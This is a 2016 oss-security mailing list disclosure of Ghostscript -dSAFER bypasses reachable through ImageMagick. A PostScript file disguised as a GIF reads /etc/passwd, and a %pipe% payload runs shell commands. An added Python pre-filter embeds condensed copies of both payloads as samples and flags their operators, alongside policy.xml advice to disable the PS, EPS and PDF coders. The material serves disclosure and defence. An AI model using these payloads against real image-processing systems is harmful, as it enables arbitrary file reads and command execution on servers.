Date: Fri, 30 Sep 2016 13:05:16 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Cc: Florian Weimer <fw@...eb.enyo.de>
Subject: Re: ImageMagick identify "d:" hangs

On Thu, Sep 29, 2016 at 2:28 PM, Tavis Ormandy <taviso@...gle.com> wrote:
>
> Just for future reference, here is an example of dumping a file to an
> image processed with ImageMagick that works with gs 9.20:
>
> $ cat test.gif
> %!PS
> /Size 20 def                             % font/line size
> /Line 0 def                              % current line
> /Buf 1024 string def                     % line buffer
> /Path 0 newpath def
>
> /Courier-Bold findfont Size scalefont setfont
> 1 1 1 setrgbcolor clippath fill          % draw white background
> 0 0 0 setrgbcolor                        % set black foreground
>
> (/etc/passwd) .libfile {
>     {
>         dup Buf readline
>         {
>             Path Line moveto show
>         }{
>             showpage
>             quit
>         } ifelse
>         % next line
>         /Line Line Size add def
>     } loop
> } if
> $ convert test.gif png:test.png

The more I look, the worse it gets. This also works in 9.18 and
higher: arbitrary shell command execution.

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
$ convert test.gif png:test.png

(Note: I don't know why it doesn't work on earlier versions, maybe
it's possible to make it work, or some other param will work)

I think -dSAFER is too dangerous to use without sandboxing right now;
things like evince and imagemagick that use it as a backend should
disable it by default.

I'm not planning to look any more at this.

Tavis.
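The practical consequence of the two payloads above is that a consumer of untrusted images cannot trust the file extension: ImageMagick sniffs content, so a "test.gif" that really is PostScript still reaches the Ghostscript delegate, and -dSAFER does not stop `.libfile` reads or `%pipe%` command execution. The following pre-filter is an added example, not code from this thread, from ImageMagick or from Ghostscript. It refuses anything that looks like PostScript or PDF (the "disable by default" advice above) and additionally scans the body for the exact primitives the thread shows, because the second payload has no `%!PS` header at all. The magic-byte list and the token list are assumptions: they cover what this thread demonstrates, not every SAFER escape, which is precisely why the content check alone is not the fix.

```python
"""
Added example (not code from the thread, ImageMagick or Ghostscript): a
pre-filter that refuses input ImageMagick would hand to its Ghostscript
delegate and flags the -dSAFER bypass primitives shown in this thread.

Assumptions (also marked in the comments below):
  * PS_MAGIC/PDF_MAGIC are an assumed subset of what ImageMagick's PS/PDF
    coders recognise at offset 0; the check mimics a magic test, nothing more.
  * SUSPICIOUS lists only the operators from the two quoted payloads
    (.libfile reads, %pipe% via .putdeviceparams); it is not a complete list
    of SAFER escapes, so any PostScript/PDF content is refused outright.
"""
from dataclasses import dataclass, field

# Assumed subset of the leading bytes ImageMagick's PS/PDF coders look for.
PS_MAGIC = (b"%!", b"\xc5\xd0\xd3\xc6")      # "%!PS..." or DOS EPS binary header
PDF_MAGIC = (b"%PDF-",)

# Operators and strings lifted from the payloads quoted in this thread.
SUSPICIOUS = {
    b".libfile": "opens an arbitrary path for reading despite -dSAFER",
    b"%pipe%": "%pipe% as a file name runs a shell command",
    b".putdeviceparams": "sets device parameters such as /OutputICCProfile",
    b"currentdevice": "fetches the device handle for .putdeviceparams",
}


@dataclass
class Finding:
    filename: str
    claimed_ext: str
    sniffed: str                      # "postscript", "pdf" or "other"
    reasons: list = field(default_factory=list)

    @property
    def refuse(self) -> bool:
        """True when the file must not be passed to convert/identify."""
        return bool(self.reasons)


def sniff(data: bytes) -> str:
    """Classify by leading bytes only; no whitespace skipping, by assumption."""
    if data.startswith(PS_MAGIC):
        return "postscript"
    if data.startswith(PDF_MAGIC):
        return "pdf"
    return "other"


def scan(filename: str, data: bytes) -> Finding:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    result = Finding(filename, ext, sniff(data))
    if result.sniffed != "other":
        # Any PS/PDF goes to Ghostscript, so refuse it regardless of the name.
        result.reasons.append(
            f"{result.sniffed} content is routed to the Ghostscript delegate")
        if ext not in ("ps", "eps", "pdf"):
            result.reasons.append(
                f"extension .{ext or '(none)'} does not match the content")
    # Scan the whole body: the %pipe% payload in the thread has no %!PS header,
    # so a magic check alone would miss it.
    for token, why in SUSPICIOUS.items():
        if token in data:
            result.reasons.append(f"{token.decode()}: {why}")
    return result


# Constructed samples: the two payloads quoted in the thread (condensed) plus
# a benign GIF and a benign EPS.
LIBFILE_GIF = (b"%!PS\n/Buf 1024 string def\n"
               b"(/etc/passwd) .libfile {\n"
               b"  { dup Buf readline { show }{ showpage quit } ifelse } loop\n"
               b"} if\n")
PIPE_GIF = (b"currentdevice null true mark /OutputICCProfile "
            b"(%pipe%id > /dev/tty)\n.putdeviceparams\nquit\n")
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
PLAIN_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\n"
             b"0 0 10 10 rectfill\n")

if __name__ == "__main__":
    for name, body in [("test.gif", LIBFILE_GIF), ("test.gif", PIPE_GIF),
                       ("logo.gif", REAL_GIF), ("fig.eps", PLAIN_EPS)]:
        finding = scan(name, body)
        print(f"{name}: {'REFUSE' if finding.refuse else 'ok'} ({finding.sniffed})")
        for reason in finding.reasons:
            print("   -", reason)
```

Run stand-alone, the script refuses both payloads from the thread (the first because it is PostScript with a mismatched extension and uses `.libfile`, the second purely on the `currentdevice`/`%pipe%`/`.putdeviceparams` tokens), refuses the plain EPS because it would still reach Ghostscript, and passes the real GIF. Treat the token scan as a tripwire for logging, not as the control: the control is refusing the PS/EPS/PDF coders entirely, which on an ImageMagick install is done in policy.xml with `<policy domain="coder" rights="none" pattern="PS" />` and matching entries for EPS, PDF and XPS, so that the delegate is never invoked for untrusted input.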
